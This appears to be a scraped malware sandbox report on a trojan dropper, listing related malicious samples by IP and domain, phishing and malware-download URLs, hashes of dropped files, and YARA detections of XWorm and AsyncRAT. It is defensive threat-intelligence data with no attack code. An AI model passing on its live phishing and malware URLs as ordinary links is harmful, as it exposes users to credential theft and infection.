                                                                                                                                              NlVGatrBgz.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                Avviso_di_Pagamento__Banca_BPM_pdf.batGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                  atom.ps1Get hashmaliciousAMSIReaper, AgentTeslaBrowse
                                                                                                                                                    invoice-1580727057.pdf_.JS.jsGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                      SecuriteInfo.com.Win32.PWSX-gen.8295.28016.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                        U00a0_.JS.jsGet hashmaliciousAMSIReaper, AgentTeslaBrowse
                                                                                                                                                          167.71.56.116WinScanGuard_v.2.1.batGet hashmaliciousQuasarBrowse
                                                                                                                                                            Shadow-Stealer.batGet hashmaliciousQuasarBrowse
                                                                                                                                                              OvA6x5v34G.exeGet hashmaliciousAsyncRATBrowse
                                                                                                                                                                zUYpYikG7T.exeGet hashmaliciousnjRatBrowse
                                                                                                                                                                  SdwkQEBnc3.exeGet hashmaliciousNanocoreBrowse
                                                                                                                                                                    riV1K85Awe.exeGet hashmaliciousNanocoreBrowse
                                                                                                                                                                      Malwarebytes Gears.exeGet hashmaliciousAsyncRATBrowse
                                                                                                                                                                        H8RZSly6dG.exeGet hashmaliciousNjratBrowse
                                                                                                                                                                          8E8732B9BEBC8382E938B48697E79FEB4B06528DF41FD.exeGet hashmaliciousnjRatBrowse
                                                                                                                                                                            qCotr6jZt2.exeGet hashmaliciousnjRatBrowse
                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                              eu-central-7075.packetriot.netWinScanGuard_v.2.1.batGet hashmaliciousQuasarBrowse
                                                                                                                                                                              • 167.71.56.116
                                                                                                                                                                              Shadow-Stealer.batGet hashmaliciousQuasarBrowse
                                                                                                                                                                              • 167.71.56.116
                                                                                                                                                                              OvA6x5v34G.exeGet hashmaliciousAsyncRATBrowse
                                                                                                                                                                              • 167.71.56.116
                                                                                                                                                                              zUYpYikG7T.exeGet hashmaliciousnjRatBrowse
                                                                                                                                                                              • 167.71.56.116
                                                                                                                                                                              SdwkQEBnc3.exeGet hashmaliciousNanocoreBrowse
                                                                                                                                                                              • 167.71.56.116
                                                                                                                                                                              riV1K85Awe.exeGet hashmaliciousNanocoreBrowse
                                                                                                                                                                              • 167.71.56.116
                                                                                                                                                                              Malwarebytes Gears.exeGet hashmaliciousAsyncRATBrowse
                                                                                                                                                                              • 167.71.56.116
                                                                                                                                                                              api.telegram.orghttps://www.mediafire.com/file/8eop2r1ad81z2k2/Sipari%C5%9F+&Ouml;zellikleri+pdf.tgz/fileGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                              A1234.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                              SecuriteInfo.com.Win32.PWSX-gen.19724.10468.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                              1.jsGet hashmaliciousAMSIReaperBrowse
                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                              NlVGatrBgz.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                              Avviso_di_Pagamento__Banca_BPM_pdf.batGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                              atom.ps1Get hashmaliciousAMSIReaper, AgentTeslaBrowse
                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                              invoice-1580727057.pdf_.JS.jsGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                              SecuriteInfo.com.Win32.PWSX-gen.8295.28016.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                              U00a0_.JS.jsGet hashmaliciousAMSIReaper, AgentTeslaBrowse
                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                              TELEGRAMRUhttps://telegra.ph/St-JCPD-02-05-2Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                              • 149.154.164.13
                                                                                                                                                                              https://www.mediafire.com/file/8eop2r1ad81z2k2/Sipari%C5%9F+&Ouml;zellikleri+pdf.tgz/fileGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                              A1234.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                              rNUBzMB8Cm.exeGet hashmaliciousClipboard Hijacker, Djvu, Fabookie, Glupteba, RedLine, SmokeLoader, StealcBrowse
                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                              SecuriteInfo.com.Win32.PWSX-gen.19724.10468.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                              1.jsGet hashmaliciousAMSIReaperBrowse
                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                              NlVGatrBgz.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                              Avviso_di_Pagamento__Banca_BPM_pdf.batGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                              atom.ps1Get hashmaliciousAMSIReaper, AgentTeslaBrowse
                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                              invoice-1580727057.pdf_.JS.jsGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                              DIGITALOCEAN-ASNUShttps://onedrivescmws.top/?tkmilricGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                              • 165.227.152.218
                                                                                                                                                                              https://telegra.ph/St-JCPD-02-05-2Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                              • 67.205.184.66
                                                                                                                                                                              http://shjj.ysxo.phestoslevi.online/wr/#?service=bmFzc2ltLmdyaWJpQGNyb3dlLmNvLnVrJnJvYXIyJmM=Get hashmaliciousUnknownBrowse
                                                                                                                                                                              • 188.166.216.120
                                                                                                                                                                              Setup (1).exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 161.35.127.181
                                                                                                                                                                              Setup (1).exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 161.35.127.181
                                                                                                                                                                              S23UhdW5DH.exeGet hashmaliciousLummaC, Glupteba, SmokeLoader, Socks5Systemz, StealcBrowse
                                                                                                                                                                              • 164.90.197.162
                                                                                                                                                                              mpsl-20240205-0055.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                                              • 159.65.206.21
                                                                                                                                                                              x86_64-20240205-0055.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                                              • 157.230.201.3
                                                                                                                                                                              https://ca-net-fix-assistenzaonline.codeanyapp.com/neet/net/net/login.phpGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 45.55.112.74
                                                                                                                                                                              https://t.co/kdpDbpIXphGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 104.248.10.131
                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                              3b5074b1b5d032e5620f69f9f700ff0eHavale_Referans#U0131_0230958PO570304_Tutar_20.000_Euro_pdf_.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                              an_international_agreement_to_voluntarily_limit_greenhouse_gas_emissions_is_called_the_60718.jsGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                              an_international_agreement_to_voluntarily_limit_greenhouse_gas_emissions_is_called_the_60718.jsGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                              9hWoCDK60X.exeGet hashmaliciousDCRatBrowse
                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                              7abf5ad882fd72332b0b7fb530c8c6505852d4f7ea39edfe444218bdcd9c7f0e_dump.exeGet hashmaliciousGlupteba, SmokeLoader, StealcBrowse
                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                              Factura_Proforma-Asesoramiento_Bancario.Pif.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                              https://www.google.com.np/amp/s/www.google.com%2Furl%3Fq%3Dhttps%253A%252F%252Fimmofiplus.com%252Fcgi-bin%252F%26sa%3DD%26sntz%3D1%26usg%3DAOvVaw3plx_rZYk875jSTY_j4-Gb#?im=Y2dhdGVzQGFjYy5vcmc=Get hashmaliciousUnknownBrowse
                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                              Copia_del_Pagamento__Intesa_Sanpaolo.pdf.bat.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                              ujWn3eOza6.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                              9dDFUhi7hw.exeGet hashmaliciousDCRatBrowse
                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                              No context
                                                                                                                                                                              Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):65536
                                                                                                                                                                              Entropy (8bit):1.434973820107164
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:192:SHnR5uek081iHy9MaWj8iyX8ClllX9IzuiFDZ24lO8zWnY:qfu281ixa48i/yVSzuiFDY4lO8C
                                                                                                                                                                              MD5:9B83CD8C48A074A6D367FD3270A9E256
                                                                                                                                                                              SHA1:523FB837352381D8D69383F7C3AE86D557CFE445
                                                                                                                                                                              SHA-256:FA6FF03E36F71B61A94772769933B514EB7CFDD34FE6EDF86C1A7E5608114F68
                                                                                                                                                                              SHA-512:5D30B2A302D3192A9D6076230D367B8EA1903DF2B1180902776062FB4269CAEDED98C6F707B4238C14FD0B12EC3F5B1FFFD67056782B66D34F11AF6EE64E5E52
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.1.6.8.2.1.3.6.0.0.8.7.6.1.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.1.6.8.2.1.3.8.4.4.6.2.4.2.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.2.f.4.a.d.2.9.-.3.c.f.9.-.4.2.d.5.-.b.1.3.a.-.1.a.2.0.b.d.5.d.d.a.f.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.c.f.4.9.7.e.f.-.d.4.b.5.-.4.7.7.b.-.b.5.9.9.-.7.3.6.e.2.9.e.1.8.1.6.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.X...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.X...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.c.d.0.-.0.0.0.1.-.0.0.1.4.-.b.5.8.7.-.e.2.2.3.d.7.5.8.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.1.9.5.f.c.3.8.8.a.f.4.3.5.9.5.d.8.0.1.5.b.1.2.d.e.1.5.5.e.8.0.0.0.0.0.0.0.0.0.!.0.0.0.0.f.0.1.9.7.d.2.d.a.7.6.f.5.6.3.3.7.3.6.8.6.d.d.1.0.4.3.0.5.d.1.e.e.b.2.1.e.c.7.c.!.X...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.0.
                                                                                                                                                                              Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                              File Type:Mini DuMP crash report, 16 streams, Tue Feb 6 08:35:37 2024, 0x1205a4 type
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):559183
                                                                                                                                                                              Entropy (8bit):3.0112893927906543
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3072:uQHum4RhsWRj4cS066QrutPledQ1CCqhP1x8FHzoZYSVJWw53+vBAIWo4yiI1pok:u7SQY065W1qn53QzWoFiI
                                                                                                                                                                              MD5:7E475450ACE996612E0074528694C7C6
                                                                                                                                                                              SHA1:B84FAAE43CECEA25B4504B042E270EED13F482C5
                                                                                                                                                                              SHA-256:6DB8B9E002F7687A112D042CF7E459DC110767958F6BBA208FA2F33DC1AD104D
                                                                                                                                                                              SHA-512:E5DBA756608B59331E7B2513A587FC29D98CFF83CCBF3AC15D22DA87DBEC5EB69684813A34449892EFAE9A7C180227C7ABC444F76E909CB8E79F8108EBC4C309
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:MDMP..a..... .......Y..e............d...........(-..........<....7...........7......tB..............l.......8...........T...........(t..'............J...........L..............................................................................eJ......lM......Lw......................T..............e....4........................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):6856
                                                                                                                                                                              Entropy (8bit):3.7214820203371124
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:192:R6l7wVeJgvZVZsIYZN8YprfP89bvNZbfilm:R6lXJQZVtYD0vzbf5
                                                                                                                                                                              MD5:7B1671C1313CF58B46D03A9CC907C8CF
                                                                                                                                                                              SHA1:1AB74728D05BE993287B7FA2A13ECC394CDCC971
                                                                                                                                                                              SHA-256:02AAB5DC9B144A031A28D5D3A1BC8D5F5DE571FCD36C4770A2A6D2D6B409C35D
                                                                                                                                                                              SHA-512:24D4C2EAF12B23EE9CD0B07C58D5721ACEEA7F19327A07F8AD96D3F264E825CCE832289F54E5B63929C3E06481992EF044894C9B3730460C9F0CA3B0B16535AF
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.2.8.0.<./.P.i.
                                                                                                                                                                              Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):4717
                                                                                                                                                                              Entropy (8bit):4.422384087269718
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:48:cvIwWl8zsXJg771I9eCq5WpW8VY6Ym8M4JbEFPNGyq8vV3Ythd:uIjf5I7FCqI7VmJwNGWRYthd
                                                                                                                                                                              MD5:4768A63EA73736272555164C2B21CA79
                                                                                                                                                                              SHA1:516970A6EDDC8B879849F9ADADA97BD9608A79E8
                                                                                                                                                                              SHA-256:BD77BFC4039A6DE25A24906BB6E311044B945E7BCFB548C5CC5DA84A8EAF9DBC
                                                                                                                                                                              SHA-512:52E545DB2BF376B60C2C91687D10CC1527EEA33B0A3B1B72DAB1EA2E58A107D741F6D70486A55D7946081840143F8C6242A828DB4D5B231A00F7E8B0DD84F10B
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="181418" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):77352
                                                                                                                                                                              Entropy (8bit):3.0736853801486363
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:1536:a2e8IPCwf0ObU17XZm8gTzyYktKI+E++G+doKG+q+OG+uG+H+oSV+P+o+0+t+fEO:a2e8IPCwf0ObU17XZm8gTzyYkKI+E++h
                                                                                                                                                                              MD5:5743EFDB51197701120D439B77AC2D9D
                                                                                                                                                                              SHA1:FC148237ABC8F3CD51B36DC0C3216EF7ABDA201E
                                                                                                                                                                              SHA-256:461A71BEBD2E7AAA07E98E1CFDADB5CD6B475D102AC7D38AB16108C66F4123BD
                                                                                                                                                                              SHA-512:86B15D33CDA2E8794F5380FC0478348F663044A5431D3BEEB330F69ED894D15B02C8C7F995BCE9FBE287DB8F46A5C03FC438933754EAFAFAFAFADE72002D41E8
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):13340
                                                                                                                                                                              Entropy (8bit):2.685016712028871
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:96:TiZYWA41DwhhYO6YUWaaH6YEZsdsCtdiGEKyBXwZM2YUaR+BM4vTocIUA3:2ZDA5/6/id68eUaR+BMCTobUA3
                                                                                                                                                                              MD5:BB1D0C9A301FC81108B51F4F8AFCB1C6
                                                                                                                                                                              SHA1:BA65993C8129254DBE791CEA98ABE2E1FDD99F29
                                                                                                                                                                              SHA-256:AE3CE98DBD95A387A51D9022485FE71717D27D91DB9CBF011A1F4023DEA78B60
                                                                                                                                                                              SHA-512:A1746F8C5DCA0C80C8FEDA9874EFEA2A6585760327E2B2E5CA2BA1AC9228AD64085B5F4C8B87990EAA478A764BB28CE82BBB3184B650CE5A2A43528B6395C19D
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                                                                                                                                                              Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe
                                                                                                                                                                              File Type:CSV text
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):654
                                                                                                                                                                              Entropy (8bit):5.380476433908377
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                                                                                                                                                              MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                                                                                                                                                              SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                                                                                                                                                              SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                                                                                                                                                              SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:moderate, very likely benign file
                                                                                                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..
                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\X.exe
                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):36864
                                                                                                                                                                              Entropy (8bit):5.5767765436987435
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:768:zDf+ZLVzkPLie7Vs6Ji5YYFg9KDO/hg/l193T:f+PzILv7di/Fg9KDO/Cd1dT
                                                                                                                                                                              MD5:F57EC853B0F01B0E9954CFBF8FEEB081
                                                                                                                                                                              SHA1:F0197D2DA76F563373686DD104305D1EEB21EC7C
                                                                                                                                                                              SHA-256:3D07268C23490174416EF5A8061E318B5B8B820CB89B27803996085C3B3EE927
                                                                                                                                                                              SHA-512:72593F450A183A53C81A70F9C23AB0EBA4CE46C64C3713F64A6606A3F3344305DFBE3D747FDE2C5353BCB6463EEEFC9B3B0B29395FEB9D71BC540A8D451A72AF
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Yara Hits:
                                                                                                                                                                              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\Svchost.exe, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\Svchost.exe, Author: Joe Security
                                                                                                                                                                              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\Svchost.exe, Author: ditekSHen
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 82%
                                                                                                                                                                              • Antivirus: Virustotal, Detection: 77%, Browse
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......e................................ ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........V...N............................................................(....*..(....*.s.........s.........s.........s.........*...0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0............(....(.....+..*....0...........(.....+..*..0...............(.....+..*..0...........(.....+..*..0................-.(...+.+.+...+..*.0.........................*..(....*.0.. .......~.........-.(...+.....~.....+..*..(....*.0..
                                                                                                                                                                              Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe
                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1907200
                                                                                                                                                                              Entropy (8bit):5.216055990815914
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:+tjkC9sS0W1PJY7BaSjwI1nTmtO2WC780/TaSX88:w0MSNnWXWC71TaSX
                                                                                                                                                                              MD5:C0E5B07CBF2D02C54F39CE6AAD676DC7
                                                                                                                                                                              SHA1:4100B839D867B252FFA991F91FB9E403B8E41256
                                                                                                                                                                              SHA-256:0198B7C285A13C98123BBCF85D1B072BCC00F225F6D30867F4AB3BE1EA927DA8
                                                                                                                                                                              SHA-512:7E87CA707772BCFD2121F350A001C36A5EDA420E39F4612EF2D36F0B00734837BF5435421A1F005BF88CE4C6F83C79F10C46E8F7D9A793B9F970F88B8A64D87F
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Antivirus:
